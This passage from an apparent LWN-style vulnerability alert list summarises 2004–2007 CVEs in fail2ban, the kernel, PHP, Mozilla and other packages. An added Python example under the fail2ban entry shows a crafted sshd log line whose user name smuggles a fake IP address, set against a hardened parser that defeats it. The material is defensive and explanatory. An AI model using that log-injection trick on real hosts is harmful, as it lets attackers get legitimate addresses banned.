| CVE #(s): | CVE-2006-5877 |
| Created: | February 23, 2007 |
| Updated: | February 28, 2007 |
| Description: | Mikhail Markin reported that enigmail incorrectly handled memory allocations for certain large encrypted attachments. This caused Thunderbird to crash and thus caused the entire message to be inaccessible. |
fail2ban: denial of service
| Package(s): | fail2ban |
| CVE #(s): | CVE-2006-6302 |
| Created: | February 16, 2007 |
| Updated: | July 30, 2007 |
| Description: | fail2ban 0.7.4 and earlier does not properly parse sshd log files, which allows remote attackers to add arbitrary hosts to the /etc/hosts.deny file and cause a denial of service by adding arbitrary IP addresses to the sshd log file, as demonstrated by logging in to ssh using a login name containing certain strings with an IP address. |
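The parsing mistake this entry describes, next to the fix for it, as an added example (not fail2ban's own code): a regular expression that takes the first dotted quad found anywhere in an sshd line will pick up a user name that looks like an address, while a pattern anchored on sshd's own trailing "from <addr>" field will not. The log lines are constructed and use RFC 5737 documentation addresses; the exact sshd message formats are an assumption based on common "Failed password" and "Invalid user" lines.

```python
import ipaddress
import re

# Constructed sshd log lines. In the second one the attempted user name was
# literally "x from 198.51.100.7"; the real client is 203.0.113.5 in both.
LOG_LINES = [
    "Mar  5 10:12:01 host sshd[1234]: Failed password for invalid user bob from 203.0.113.5 port 4242 ssh2",
    "Mar  5 10:12:02 host sshd[1235]: Invalid user x from 198.51.100.7 from 203.0.113.5",
]

DOTTED_QUAD = r"\d{1,3}(?:\.\d{1,3}){3}"

# Naive: the first thing that looks like an address, wherever it occurs.
NAIVE_RE = re.compile(DOTTED_QUAD)

# Hardened: the address must sit in sshd's own trailing
# "from <addr>[ port <n>][ ssh2]" field, anchored to the end of the line,
# so attacker-controlled text earlier in the message cannot supply it.
HARDENED_RE = re.compile(r" from (" + DOTTED_QUAD + r")(?: port \d+)?(?: ssh2)?$")


def naive_source_ip(line):
    m = NAIVE_RE.search(line)
    return m.group(0) if m else None


def hardened_source_ip(line):
    m = HARDENED_RE.search(line)
    if not m:
        return None
    try:
        return str(ipaddress.ip_address(m.group(1)))   # also rejects e.g. 999.1.1.1
    except ValueError:
        return None


def compare(lines):
    """Return (naive, hardened) per line; a mismatch is a line on which the
    naive parser would have banned the wrong host."""
    return [(naive_source_ip(line), hardened_source_ip(line)) for line in lines]


if __name__ == "__main__":
    for line, (naive, hardened) in zip(LOG_LINES, compare(LOG_LINES)):
        print("naive=%s hardened=%s  %s" % (naive, hardened, line))
```

The end anchor does the real work: with the second line, the leftmost " from 198.51.100.7" cannot be followed by end-of-line, so the regex engine moves on and matches the final field instead. A parser that bans hosts should also validate the extracted value as an address and refuse to act on private or local ranges it would never want to block.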
fetchmail: password disclosure and DOS
| Package(s): | fetchmail |
| CVE #(s): | CVE-2006-5867, CVE-2006-5974 |
| Created: | January 10, 2007 |
| Updated: | March 16, 2007 |
| Description: | Fetchmail suffers from a password disclosure vulnerability due to a failure to use secure protocols (advisory) and a denial of service vulnerability (advisory). |
ffmpeg: buffer overflows
| Package(s): | ffmpeg |
| CVE #(s): | CVE-2006-4799, CVE-2006-4800 |
| Created: | September 14, 2006 |
| Updated: | May 28, 2007 |
| Description: | The AVI processing code in FFmpeg has a number of buffer overflow vulnerabilities. If an attacker can trick a user into loading a specially crafted AVI, arbitrary code can be executed with the user's privileges. |
Mozilla stuff: multiple vulnerabilities
freeradius: several vulnerabilities
| Package(s): | freeradius |
| CVE #(s): | CVE-2005-4745, CVE-2005-4746 |
| Created: | August 8, 2006 |
| Updated: | April 24, 2007 |
| Description: | Several remote vulnerabilities have been discovered in freeradius, a high-performance RADIUS server, which may lead to SQL injection or denial of service. |
freetype: integer overflows
| Package(s): | freetype |
| CVE #(s): | CVE-2006-0747, CVE-2006-1861, CVE-2006-2493, CVE-2006-2661, CVE-2006-3467 |
| Created: | June 8, 2006 |
| Updated: | June 1, 2010 |
| Description: | The FreeType library has several integer overflow vulnerabilities. If a user can be tricked into installing a specially crafted font file, arbitrary code can be executed with the privilege of the user. |
gcc: file overwrite vulnerability
| Package(s): | gcc |
| CVE #(s): | CVE-2006-3619 |
| Created: | September 6, 2006 |
| Updated: | March 14, 2008 |
| Description: | The fastjar utility found in the GNU compiler collection does not perform adequate file path checking, allowing the creation or overwriting of files outside of the current directory tree. |
gd: buffer overflow
| Package(s): | gd |
| CVE #(s): | CVE-2007-0455 |
| Created: | February 7, 2007 |
| Updated: | November 18, 2009 |
| Description: | The gd graphics library contains a buffer overflow which could enable a remote attacker to execute arbitrary code. Note that various other packages include code from gd and could also be vulnerable. |
| Alerts: | |
Comments (2 posted)
gdb: buffer overflow
| Package(s): | gdb |
| CVE #(s): | CVE-2006-4146 |
| Created: | September 15, 2006 |
| Updated: | June 12, 2007 |
| Description: | A buffer overflow in dwarfread.c and dwarf2read.c debugging code in GNU Debugger (GDB) 6.5 allows user-assisted attackers, or restricted users, to execute arbitrary code via a crafted file with a location block (DW_FORM_block) that contains a large number of operations. |
| Alerts: | |
Comments (none posted)
gdm: improper file permissions
| Package(s): | gdm |
| CVE #(s): | CVE-2006-1057 |
| Created: | April 19, 2006 |
| Updated: | May 2, 2007 |
| Description: | The .ICEauthority file may be created with the wrong ownership and permissions; gdm 2.14.2 fixes the problem. |
| Alerts: | |
Comments (none posted)
gedit: format string vulnerability
| Package(s): | gedit |
| CVE #(s): | CAN-2005-1686 |
| Created: | June 9, 2005 |
| Updated: | February 5, 2009 |
| Description: | A format string vulnerability has been discovered in gedit. Calling the program with specially crafted file names caused a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the gedit user. |
| Alerts: | |
Comments (1 posted)
gnomemeeting: format string flaw
| Package(s): | gnomemeeting |
| CVE #(s): | CVE-2007-1007 |
| Created: | February 20, 2007 |
| Updated: | March 5, 2007 |
| Description: | A format string flaw was found in the way GnomeMeeting processes certain messages. If a user is running GnomeMeeting, a remote attacker who can connect to GnomeMeeting could trigger this flaw and potentially execute arbitrary code with the privileges of the user. |
| Alerts: | |
Comments (none posted)
gnupg: stack overwrite
| Package(s): | gnupg |
| CVE #(s): | CVE-2006-6235 |
| Created: | December 12, 2006 |
| Updated: | March 13, 2007 |
| Description: | A "stack overwrite" vulnerability in GnuPG (gpg) allows attackers to execute arbitrary code via crafted OpenPGP packets that cause GnuPG to dereference a function pointer from deallocated stack memory. |
| Alerts: | |
Comments (3 posted)
grip: buffer overflow
| Package(s): | grip |
| CVE #(s): | CAN-2005-0706 |
| Created: | March 10, 2005 |
| Updated: | November 19, 2008 |
| Description: | Grip, a CD ripper, has a buffer overflow vulnerability that can occur when the CDDB server returns more than 16 matches. |
| Alerts: | |
Comments (none posted)
gv: stack-based buffer overflow
| Package(s): | gv |
| CVE #(s): | CVE-2006-5864 |
| Created: | November 20, 2006 |
| Updated: | April 9, 2007 |
| Description: | Stack-based buffer overflow in the ps_gettext function in ps.c for GNU gv 3.6.2, and possibly earlier versions, allows user-assisted attackers to execute arbitrary code via a PostScript (PS) file with certain headers that contain long comments, as demonstrated using the DocumentMedia header. |
| Alerts: | |
Comments (none posted)
gzip: multiple vulnerabilities
| Package(s): | gzip |
| CVE #(s): | CVE-2006-4334, CVE-2006-4335, CVE-2006-4336, CVE-2006-4337, CVE-2006-4338 |
| Created: | September 19, 2006 |
| Updated: | January 20, 2010 |
| Description: | Tavis Ormandy of the Google Security Team discovered two denial of service flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to hang or crash. Tavis Ormandy of the Google Security Team also discovered several code execution flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to crash or execute arbitrary code. |
| Alerts: | |
Comments (1 posted)
horde-kronolith: local file inclusion
| Package(s): | horde-kronolith |
| CVE #(s): | CVE-2006-6175 |
| Created: | January 17, 2007 |
| Updated: | March 7, 2008 |
| Description: | Kronolith contains a mistake in lib/FBView.php where a raw, unfiltered string is used instead of a sanitized string to view local files. An authenticated attacker could craft an HTTP GET request that uses directory traversal techniques to execute any file on the web server as PHP code, which could allow information disclosure or arbitrary code execution with the rights of the user running the PHP application (usually the webserver user). |
| Alerts: | |
Comments (none posted)
ImageMagick: buffer overflows
| Package(s): | ImageMagick |
| CVE #(s): | CVE-2006-5456 |
| Created: | October 31, 2006 |
| Updated: | March 8, 2007 |
| Description: | Multiple buffer overflows in GraphicsMagick before 1.1.7 and ImageMagick 6.0.7 allow user-assisted attackers to cause a denial of service and possibly execute arbitrary code via (1) a DCM image that is not properly handled by the ReadDCMImage function in coders/dcm.c, or (2) a PALM image that is not properly handled by the ReadPALMImage function in coders/palm.c. |
| Alerts: | |
Comments (2 posted)
imlib2: arbitrary code execution
| Package(s): | imlib2 |
| CVE #(s): | CVE-2006-4806, CVE-2006-4807, CVE-2006-4808, CVE-2006-4809 |
| Created: | November 6, 2006 |
| Updated: | August 13, 2007 |
| Description: | M. Joonas Pihlaja discovered that imlib2 did not sufficiently verify the validity of ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF images. If a user were tricked into viewing or processing a specially crafted image with an application that uses imlib2, the flaws could be exploited to execute arbitrary code with the user's privileges. |
| Alerts: | |
Comments (none posted)
java: multiple vulnerabilities
| Package(s): | java |
| CVE #(s): | CVE-2006-4339, CVE-2006-4790, CVE-2006-6731, CVE-2006-6736, CVE-2006-6737, CVE-2006-6745 |
| Created: | January 18, 2007 |
| Updated: | June 4, 2010 |
| Description: | Java has multiple vulnerabilities, including: an RSA exponent padding attack vulnerability; two vulnerabilities which allow untrusted applets to access data in other applets; vulnerabilities that involve applets gaining privileges due to serialization bugs in the JRE; and buffer overflows in the Java image handling routines that can give attackers read/write/execute capabilities for local files. |
| Alerts: | |
Comments (1 posted)
kdelibs: integer overflow
| Package(s): | kdelibs |
| CVE #(s): | CVE-2006-4811 |
| Created: | October 18, 2006 |
| Updated: | March 5, 2007 |
| Description: | The KDE khtml library can pass untrusted parameters into Qt, allowing a hostile user to trigger an integer overflow there and execute arbitrary code. |
| Alerts: | |
Comments (none posted)
kdelibs: kate backup file permission leak
| Package(s): | kdelibs kate kwrite |
| CVE #(s): | CAN-2005-1920 |
| Created: | July 19, 2005 |
| Updated: | September 21, 2010 |
| Description: | Kate / Kwrite, as shipped with KDE 3.2.x up to and including 3.4.0, creates a file backup before saving a modified file. These backup files are created with default permissions, even if the original file had more strict permissions set. See this advisory for more information. |
| Alerts: | |
Comments (1 posted)
kdelibs: cross-site scripting
| Package(s): | kdelibs konqueror |
| CVE #(s): | CVE-2007-0537 |
| Created: | February 5, 2007 |
| Updated: | August 13, 2007 |
| Description: | Konqueror 3.5.5 does not properly parse HTML comments, which allows remote attackers to conduct cross-site scripting (XSS) attacks and bypass some XSS protection schemes by embedding certain HTML tags within a comment, a related issue to CVE-2007-0478. |
| Alerts: | |
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-4623 |
| Created: | October 18, 2006 |
| Updated: | November 14, 2007 |
| Description: | The kernel DVB layer can be caused to crash with maliciously-formatted unidirectional lightweight encapsulation (ULE) data. |
| Alerts: | |
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-0007, CVE-2007-0006 |
| Created: | February 15, 2007 |
| Updated: | November 14, 2007 |
| Description: | Linux kernel versions from 2.6.9 to 2.6.20 have a denial of service vulnerability. A remote attacker can cause the key_alloc_serial function's key serial number collision avoidance code to have a null dereference, resulting in a crash. |
| Alerts: | |
Comments (1 posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-4535, CVE-2006-4538 |
| Created: | September 18, 2006 |
| Updated: | January 5, 2009 |
| Description: | Sridhar Samudrala discovered a local denial of service vulnerability in the handling of SCTP sockets. By opening such a socket with a special SO_LINGER value, a local attacker could exploit this to crash the kernel. (CVE-2006-4535) Kirill Korotaev discovered that the ELF loader on the ia64 and sparc platforms did not sufficiently verify the memory layout. By attempting to execute a specially crafted executable, a local user could exploit this to crash the kernel. (CVE-2006-4538) |
| Alerts: | |
Comments (none posted)
kernel: denial of service by memory consumption
| Package(s): | kernel |
| CVE #(s): | CVE-2006-2936 |
| Created: | July 17, 2006 |
| Updated: | November 14, 2007 |
| Description: | The ftdi_sio driver (usb/serial/ftdi_sio.c) in Linux kernel 2.6.x up to 2.6.17, and possibly later versions, allows local users to cause a denial of service (memory consumption) by writing more data to the serial port than the driver can handle, which causes the data to be queued. |
| Alerts: | |
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2007-0772 |
| Created: | February 23, 2007 |
| Updated: | November 14, 2007 |
| Description: | The Linux kernel before 2.6.20.1 allows remote attackers to cause a denial of service (oops) via a crafted NFSACL 2 ACCESS request that triggers a free of an incorrect pointer. |
| Alerts: | |
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-5757 |
| Created: | November 13, 2006 |
| Updated: | November 14, 2007 |
| Description: | From the MOKB-05-11-2006 advisory: "The ISO9660 filesystem handling code of the Linux 2.6.x kernel fails to properly handle corrupted data structures, leading to an exploitable denial of service condition. This particular vulnerability seems to be caused by a race condition and a signedness issue. When performing a read operation on a corrupted ISO9660 fs stream, the isofs_get_blocks() function will enter an infinite loop when __find_get_block_slow() callback from sb_getblk() fails ("due to various races between file io on the block device and getblk")." |
| Alerts: | |
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-2935, CVE-2006-4145, CVE-2006-3745 |
| Created: | September 1, 2006 |
| Updated: | July 30, 2008 |
| Description: | Previous versions of the kernel package are subject to several vulnerabilities. Certain malformed UDF filesystems can cause the system to crash (denial of service). Malformed CDROM firmware or USB storage devices (such as USB keys) could cause system crash (denial of service), and if they were intentionally malformed, can cause arbitrary code to run with elevated privileges. In addition, the SCTP protocol is subject to a remote system crash (denial of service) attack. |
| Alerts: | |
Comments (none posted)
kernel: multiple vulnerabilities
| Package(s): | kernel |
| CVE #(s): | CVE-2006-5749, CVE-2006-4814, CVE-2006-6106 |
| Created: | January 5, 2007 |
| Updated: | January 8, 2009 |
| Description: | A security issue has been reported in the Linux kernel due to an error in drivers/isdn/i4l/isdn_ppp.c: the "isdn_ppp_ccp_reset_alloc_state()" function never initializes an event timer before scheduling it with the "add_timer()" function. The mincore function in the kernel does not properly lock access to user space, which has unspecified impact and attack vectors, possibly related to a deadlock. Another vulnerability has been reported in the Linux kernel, caused by a boundary error within the handling of incoming CAPI messages in net/bluetooth/cmtp/capi.c. This can be exploited to overwrite certain kernel data structures. |
| Alerts: | |
Comments (none posted)
krb5: uninitialized pointers
| Package(s): | krb5 |
| CVE #(s): | CVE-2006-6143, CVE-2006-3084 |
| Created: | January 10, 2007 |
| Updated: | July 7, 2010 |
| Description: | The kadmind daemon can, in some situations, perform operations on uninitialized pointers. This bug could conceivably open up the system to a code execution attack by an unauthenticated remote attacker, but it appears to be difficult to exploit. See this advisory for details. |
| Alerts: | |
Comments (1 posted)
krb5: local privilege escalation
| Package(s): | krb5 |
| CVE #(s): | CVE-2006-3083 |
| Created: | August 9, 2006 |
| Updated: | July 7, 2010 |
| Description: | Some kerberos applications fail to check the results of setuid() calls, with the result that, if that call fails, they could continue to execute as root after thinking they had switched to a nonprivileged user. A local attacker who can cause these calls to fail (through resource exhaustion, presumably) could exploit this bug to gain root privileges. |
| Alerts: | |
Comments (none posted)
libgadu: memory alignment bug
| Package(s): | libgadu |
| CVE #(s): | CAN-2005-2370 |
| Created: | July 29, 2005 |
| Updated: | June 25, 2007 |
| Description: | Szymon Zygmunt and Michal Bartoszkiewicz discovered a memory alignment error in libgadu (from ekg, a console Gadu Gadu client, an instant messaging program), which is included in gaim, a multi-protocol instant messaging client, as well. This cannot be exploited on the x86 architecture, but on others, e.g. Sparc, it can lead to a bus error, in other words a denial of service. |
| Alerts: | |
Comments (none posted)
libgtop2: buffer overflow
| Package(s): | libgtop2 |
| CVE #(s): | CVE-2007-0235 |
| Created: | January 15, 2007 |
| Updated: | August 9, 2007 |
| Description: | The /proc parsing routines in libgtop are vulnerable to a buffer overflow. If an attacker can run a process in a specially crafted long path, then trick a user into running gnome-system-monitor, arbitrary code can be executed with the user's privileges. |
| Alerts: | |
Comments (none posted)
libmodplug: boundary errors
| Package(s): | libmodplug |
| CVE #(s): | CVE-2006-4192 |
| Created: | December 11, 2006 |
| Updated: | May 4, 2011 |
| Description: | Luigi Auriemma has reported various boundary errors in load_it.cpp and a boundary error in the "CSoundFile::ReadSample()" function in sndfile.cpp. A remote attacker can entice a user to read crafted modules or ITP files, which may trigger a buffer overflow resulting in the execution of arbitrary code with the privileges of the user running the application. |
| Alerts: | |
Comments (none posted)
libpng: buffer overflow
| Package(s): | libpng |
| CVE #(s): | CVE-2006-3334 |
| Created: | July 19, 2006 |
| Updated: | December 15, 2008 |
| Description: | In pngrutil.c, the function png_decompress_chunk() allocates insufficient space for an error message, potentially overwriting stack data, leading to a buffer overflow. |
| Alerts: | |
Comments (none posted)
libpng: heap based buffer overflow
| Package(s): | libpng |
| CVE #(s): | CVE-2006-0481 |
| Created: | February 13, 2006 |
| Updated: | December 15, 2008 |
| Description: | A heap based buffer overflow bug was found in the way libpng strips alpha channels from a PNG image. An attacker could create a carefully crafted PNG image file in such a way that it could cause an application linked with libpng to crash or execute arbitrary code when the file is opened by a victim. |
| Alerts: | |
Comments (1 posted)
libtiff: buffer overflow
| Package(s): | libtiff |
| CVE #(s): | CVE-2006-2193 |
| Created: | June 15, 2006 |
| Updated: | September 1, 2008 |
| Description: | The t2p_write_pdf_string function in libtiff 3.8.2 and earlier is vulnerable to a buffer overflow. Attackers can use a TIFF file with UTF-8 characters in the DocumentName tag to overflow a buffer, causing a denial of service, and possibly the execution of arbitrary code. |
| Alerts: | |
Comments (none posted)
libvncserver: authentication bypass
| Package(s): | libvncserver |
| CVE #(s): | CVE-2006-2450 |
| Created: | August 4, 2006 |
| Updated: | March 19, 2007 |
| Description: | LibVNCServer fails to properly validate protocol types, effectively letting users decide what protocol to use, such as "Type 1 - None". LibVNCServer will accept this security type, even if it is not offered by the server. |
| Alerts: | |
Comments (none posted)
libxml2 - arbitrary code execution
| Package(s): | libxml2 |
| CVE #(s): | CAN-2004-0110 |
| Created: | February 26, 2004 |
| Updated: | August 19, 2009 |
| Description: | Yuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6. When fetching a remote resource via FTP or HTTP, libxml2 uses special parsing routines. These routines can overflow a buffer if passed a very long URL. If an attacker is able to find an application using libxml2 that parses remote resources and allows them to influence the URL, then this flaw could be used to execute arbitrary code. |
| Alerts: | |
Comments (none posted)
libxml2: multiple buffer overflows
| Package(s): | libxml2 |
| CVE #(s): | CAN-2004-0989 |
| Created: | October 28, 2004 |
| Updated: | August 19, 2009 |
| Description: | libxml2 prior to version 2.6.14 has multiple buffer overflow vulnerabilities. If a local user passes a specially crafted FTP URL, arbitrary code may be executed. |
| Alerts: | |
Comments (none posted)
lynx: arbitrary command execution
| Package(s): | lynx |
| CVE #(s): | CVE-2005-2929 |
| Created: | November 14, 2005 |
| Updated: | September 14, 2009 |
| Description: | An arbitrary command execution bug was found in the lynx "lynxcgi:" URI handler. An attacker could create a web page redirecting to a malicious URL which could execute arbitrary code as the user running lynx. |
| Alerts: | |
Comments (none posted)
mysql: format string bug
| Package(s): | mysql |
| CVE #(s): | CVE-2006-3469 |
| Created: | July 21, 2006 |
| Updated: | July 30, 2008 |
| Description: | Jean-David Maillefer discovered a format string bug in the date_format() function's error reporting. By calling the function with invalid arguments, an authenticated user could exploit this to crash the server. |
| Alerts: | |
Comments (none posted)
MySQL: privilege violations
| Package(s): | mysql |
| CVE #(s): | CVE-2006-4031, CVE-2006-4226 |
| Created: | August 25, 2006 |
| Updated: | July 30, 2008 |
| Description: | MySQL 4.1 before 4.1.21 and 5.0 before 5.0.24 allows a local user to access a table through a previously created MERGE table, even after the user's privileges are revoked for the original table, which might violate intended security policy (CVE-2006-4031). MySQL 4.1 before 4.1.21, 5.0 before 5.0.25, and 5.1 before 5.1.12, when run on case-sensitive filesystems, allows remote authenticated users to create or access a database when the database name differs only in case from a database for which they have permissions (CVE-2006-4226). |
| Alerts: | |
Comments (none posted)
MySQL: logging bypass
| Package(s): | mysql |
| CVE #(s): | CVE-2006-0903 |
| Created: | April 4, 2006 |
| Updated: | May 21, 2008 |
| Description: | MySQL 5.0.18 and earlier allows local users to bypass logging mechanisms via SQL queries that contain the NULL character, which are not properly handled by the mysql_real_query function. NOTE: this issue was originally reported for the mysql_query function, but the vendor states that since mysql_query expects a null character, this is not an issue for mysql_query. |
| Alerts: | |
Comments (2 posted)
nbd: arbitrary code execution
| Package(s): | nbd |
| CVE #(s): | CVE-2005-3534 |
| Created: | January 6, 2006 |
| Updated: | March 7, 2011 |
| Description: | Kurt Fitzner discovered that the NBD (network block device) server did not correctly verify the maximum size of request packets. By sending specially crafted large request packets, a remote attacker who is allowed to access the server could exploit this to execute arbitrary code with root privileges. |
| Alerts: | |
Comments (none posted)
ncompress: buffer underflow
| Package(s): | ncompress |
| CVE #(s): | CVE-2006-1168 |
| Created: | August 10, 2006 |
| Updated: | February 21, 2012 |
| Description: | The ncompress compression utility has a missing boundary check. A local user can use a maliciously created file to cause a .bss buffer underflow. |
| Alerts: | |
Comments (none posted)
nexuiz: arbitrary code execution, denial of service
| Package(s): | nexuiz |
| CVE #(s): | CVE-2006-6609, CVE-2006-6610 |
| Created: | February 26, 2007 |
| Updated: | February 28, 2007 |
| Description: | Nexuiz fails to correctly validate input within "clientcommands". There is also a failure to correctly handle connection attempts from remote hosts. Using a specially crafted "clientcommand", a remote attacker can cause a buffer overflow in Nexuiz which could result in the execution of arbitrary code. Additionally, there is a Denial of Service vulnerability in Nexuiz allowing an attacker to cause Nexuiz to crash or to run out of resources by overloading it with specially crafted connection requests. |
| Alerts: | |
Comments (none posted)
openldap: security bypass
| Package(s): | openldap |
| CVE #(s): | CVE-2006-4600 |
| Created: | September 29, 2006 |
| Updated: | June 12, 2007 |
| Description: | slapd in OpenLDAP before 2.3.25 allows remote authenticated users with selfwrite Access Control List (ACL) privileges to modify arbitrary Distinguished Names (DN). |
| Alerts: | |
Comments (none posted)
OpenSSH: denial of service
| Package(s): | openssh |
| CVE #(s): | CVE-2006-4925, CVE-2006-5052 |
| Created: | October 6, 2006 |
| Updated: | November 15, 2007 |
| Description: | packet.c in ssh in OpenSSH allows remote attackers to cause a denial of service (crash) by sending an invalid protocol sequence with USERAUTH_SUCCESS before NEWKEYS, which causes newkeys[mode] to be NULL. An unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort." |
| Alerts: | |
Comments (none posted)
openssh: privilege separation issue
| Package(s): | openssh |
| CVE #(s): | CVE-2006-5794 |
| Created: | November 8, 2006 |
| Updated: | April 5, 2007 |
| Description: | From the OpenSSH 4.5 announcement: "Fix a bug in the sshd privilege separation monitor that weakened its verification of successful authentication. This bug is not known to be exploitable in the absence of additional vulnerabilities." |
| Alerts: | |
Comments (none posted)
openssh: remote denial of service
| Package(s): | openssh |
| CVE #(s): | CVE-2006-4924, CVE-2006-5051 |
| Created: | September 27, 2006 |
| Updated: | September 17, 2008 |
| Description: | OpenSSH 4.4 fixes some security issues, including a pre-authentication denial of service and an unsafe signal handler; on portable OpenSSH, a GSSAPI authentication abort could be used to determine the validity of usernames on some platforms. |
| Alerts: | |
Comments (none posted)
php: several vulnerabilities
| Package(s): | php |
| CVE #(s): | CVE-2006-4481, CVE-2006-4484, CVE-2006-4485 |
| Created: | September 8, 2006 |
| Updated: | June 13, 2008 |
| Description: | The file_exists and imap_reopen functions in PHP before 5.1.5 do not check for the safe_mode and open_basedir settings, which allows local users to bypass the settings (CVE-2006-4481). A buffer overflow in the LWZReadByte function in ext/gd/libgd/gd_gif_in.c in the GD extension in PHP before 5.1.5 allows remote attackers to have an unknown impact via a GIF file with input_code_size greater than MAX_LWZ_BITS, which triggers an overflow when initializing the table array (CVE-2006-4484). The stripos function in PHP before 5.1.5 has unknown impact and attack vectors related to an out-of-bounds read (CVE-2006-4485). |
| Alerts: | |
Comments (1 posted)
php: multiple vulnerabilities
| Package(s): | php |
| CVE #(s): | CVE-2007-0906, CVE-2007-0907, CVE-2007-0908, CVE-2007-0909, CVE-2007-0910, CVE-2007-0988 |
| Created: | February 20, 2007 |
| Updated: | March 21, 2007 |
| Description: | A number of buffer overflow flaws were found in the PHP session extension, the str_replace() function, and the imap_mail_compose() function. If very long strings under the control of an attacker are passed to the str_replace() function, then an integer overflow could occur in memory allocation. If a script uses the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker who is able to access a PHP application affected by any of these issues could trigger these flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906) If unserializing untrusted data on 64-bit platforms, the zend_hash_init() function can be forced to enter an infinite loop, consuming CPU resources for a limited length of time, until the script timeout alarm aborts execution of the script. (CVE-2007-0988) If the wddx extension is used to import WDDX data from an untrusted source, certain WDDX input packets may allow a random portion of heap memory to be exposed. (CVE-2007-0908) If the odbc_result_all() function is used to display data from a database, and the contents of the database table are under the control of an attacker, a format string vulnerability is possible which could lead to the execution of arbitrary code. (CVE-2007-0909) A one byte memory read will always occur before the beginning of a buffer, which could be triggered for example by any use of the header() function in a script. However, it is unlikely that this would have any effect. (CVE-2007-0907) Several flaws in PHP could allow attackers to "clobber" certain super-global variables via unspecified vectors. (CVE-2007-0910) |
| Alerts: | |
Comments (none posted)
php: buffer overflows
| Package(s): | php |
| CVE #(s): | CVE-2006-5465 |
| Created: | November 3, 2006 |
| Updated: | January 18, 2010 |
| Description: | The Hardened-PHP Project discovered buffer overflows in the internal routines of PHP's htmlentities and htmlspecialchars functions. Of course, the whole purpose of these functions is to be fed user input. (The overflow can only occur when UTF-8 is used.) |
| Alerts: | |
Comments (none posted)
phpbb2: missing input sanitizing
| Package(s): | phpbb2 |
| CVE #(s): | CVE-2006-1896 |
| Created: | May 22, 2006 |
| Updated: | February 11, 2008 |
| Description: | It was discovered that phpbb2, a web based bulletin board, insufficiently sanitizes values passed to the "Font Color 3" setting, which might lead to the execution of injected code by admin users. |
| Alerts: | |
Comments (none posted)
phpbb2: multiple vulnerabilities
| Package(s): | phpbb2 |
| CVE #(s): | CVE-2005-3310, CVE-2005-3415, CVE-2005-3416, CVE-2005-3417, CVE-2005-3418, CVE-2005-3419, CVE-2005-3420, CVE-2005-3536, CVE-2005-3537 |
| Created: | December 22, 2005 |
| Updated: | February 11, 2008 |
| Description: | The phpbb2 web forum has a number of vulnerabilities including: a web script injection problem, a protection mechanism bypass, a security check bypass, a remote global variable bypass, cross site scripting vulnerabilities, an SQL injection vulnerability, a remote regular expression modification problem, missing input sanitizing, and a missing request validation problem. |
| Alerts: | |
Comments (none posted)
postgresql: insufficient verification
| Package(s): | postgresql |
| CVE #(s): | CVE-2007-0555, CVE-2007-0556 |
| Created: | February 5, 2007 |
| Updated: | March 19, 2007 |
| Description: | PostgreSQL has two vulnerabilities that allow an authenticated attacker with the permissions to run arbitrary SQL to launch a denial-of-service attack or possibly read out random chunks of memory. Since attacks require authenticated access, the security hole is only considered medium risk. See the announcement for additional information. |
| Alerts: | |
Comments (none posted)
postgresql: SQL injection
| Package(s): | postgresql |
| CVE #(s): | CVE-2006-2313, CVE-2006-2314 |
| Created: | May 24, 2006 |
| Updated: | June 6, 2007 |
| Description: | The PostgreSQL team has put out a set of "urgent updates" (in the form of the 7.3.15, 7.4.13, 8.0.8, and 8.1.4 releases) closing a newly-discovered set of SQL injection issues. Details about the problem can be found on the technical information page; in short: multi-byte encodings can be used to defeat normal string sanitizing techniques. The update fixes one problem related to invalid multi-byte characters, but punts on another by simply disallowing the old, unsafe technique of escaping single quotes with a backslash. |
| Alerts: | |
Comments (1 posted)
quake: buffer overflow
| Package(s): | quake3-bin |
| CVE #(s): | CVE-2006-2236 |
| Created: | May 10, 2006 |
| Updated: | January 12, 2009 |
| Description: | Games based on the Quake 3 engine are vulnerable to a buffer overflow exploitable by a hostile game server. |
| Alerts: | |
Comments (none posted)
rpm: arbitrary code execution
| Package(s): | rpm |
| CVE #(s): | CVE-2006-5466 |
| Created: | November 6, 2006 |
| Updated: | August 28, 2007 |
| Description: | An error was found in the RPM library's handling of query reports. In some locales, certain RPM packages would cause the library to crash. If a user was tricked into querying a specially crafted RPM package, the flaw could be exploited to execute arbitrary code with the user's privileges. |
| Alerts: | |
Comments (none posted)
samba: several vulnerabilities
Comments (none posted)
Mozilla: multiple vulnerabilities
| Package(s): | seamonkey firefox thunderbird |
| CVE #(s): | CVE-2006-6077, CVE-2007-0008, CVE-2007-0009, CVE-2007-0775, CVE-2007-0777, CVE-2007-0778, CVE-2007-0779, CVE-2007-0780, CVE-2007-0800, CVE-2007-0981, CVE-2007-0995, CVE-2007-0996 |
| Created: | February 26, 2007 |
| Updated: | July 23, 2007 |
| Description: | Several flaws were found in the way SeaMonkey processed certain malformed JavaScript code. A malicious web page could execute JavaScript code in such a way that may result in SeaMonkey crashing or executing arbitrary code as the user running SeaMonkey. (CVE-2007-0775, CVE-2007-0777) Several cross-site scripting (XSS) flaws were found in the way SeaMonkey processed certain malformed web pages. A malicious web page could display misleading information which may result in a user unknowingly divulging sensitive information such as a password. (CVE-2006-6077, CVE-2007-0995, CVE-2007-0996) A flaw was found in the way SeaMonkey cached web pages on the local disk. A malicious web page may be able to inject arbitrary HTML into a browsing session if the user reloads a targeted site. (CVE-2007-0778) A flaw was found in the way SeaMonkey displayed certain web content. A malicious web page could generate content which could overlay user interface elements such as the hostname and security indicators, tricking a user into thinking they are visiting a different site. (CVE-2007-0779) Two flaws were found in the way SeaMonkey displayed blocked popup windows. If a user can be convinced to open a blocked popup, it is possible to read 